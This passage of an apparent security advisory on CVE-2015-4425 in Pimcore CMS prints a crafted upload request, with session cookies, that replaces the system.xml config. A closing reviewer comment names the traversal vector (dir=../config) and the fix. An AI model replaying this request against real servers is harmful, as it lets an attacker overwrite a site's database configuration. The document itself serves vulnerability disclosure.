User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: multipart/form-data; boundary=--------2072505619
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=nnmupv1knofcpdgjdnivdr4v27; cookie-warn=true; _ga=GA1.2.1941920115.1426505099; pimcore_admin_sid=j79b6ad4afkjimslbj8l5ifuo4
----------2072505619
Content-Disposition: form-data; name="Filedata"; filename="system.xml"
Content-Type: application/xml
<?xml version="1.0"?>
<zend-config xmlns:zf="http://framework.zend.com/xml/zend-config-xml/1.0/">
<general>
<timezone>Europe/Berlin</timezone>
<language>en</language>
<validLanguages>en</validLanguages>
<debug>1</debug>
<debugloglevel>debug</debugloglevel>
<custom_php_logfile>1</custom_php_logfile>
</general>
<database>
<adapter>Mysqli</adapter>
<params>
<username>root</username>
<password>PASSWORD</password>
<dbname>pimcore</dbname>
<host>localhost</host>
<port>3306</port>
</params>
</database>
<documents>
<versions>
<steps>10</steps>
</versions>
<default_controller>default</default_controller>
<default_action>default</default_action>
<error_pages>
<default>/</default>
</error_pages>
<createredirectwhenmoved/>
<allowtrailingslash>no</allowtrailingslash>
<allowcapitals>no</allowcapitals>
<generatepreview>1</generatepreview>
</documents>
<objects>
<versions>
<steps>10</steps>
</versions>
</objects>
<assets>
<versions>
<steps>10</steps>
</versions>
</assets>
<services/>
<cache>
<excludeCookie/>
</cache>
<httpclient>
<adapter>Zend_Http_Client_Adapter_Socket</adapter>
</httpclient>
</zend-config>
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-4425/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
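Review bot: the request is not anonymised the way 37610.txt's is: Host is pimcore.com (the vendor's public site), Origin is https://www.host.com, and the Cookie line carries what look like live PHPSESSID, pimcore_admin_sid and _ga values; replace them with <HOST> and <SESSIONID> placeholders before publication. The multipart body also ends without the closing `----------2072505619--` boundary while Content-Length is fixed at 1502, so the printed request is incomplete and should be marked as excerpted. On substance the file has what triage needs and should keep it: the precondition (an administrative user with the 'assets' permission), the vector (dir=../config on /admin/asset/add-asset-compatibility/), the overwritten file (system.xml, database credentials included) and the fix (Build 3473, CVE-2015-4425).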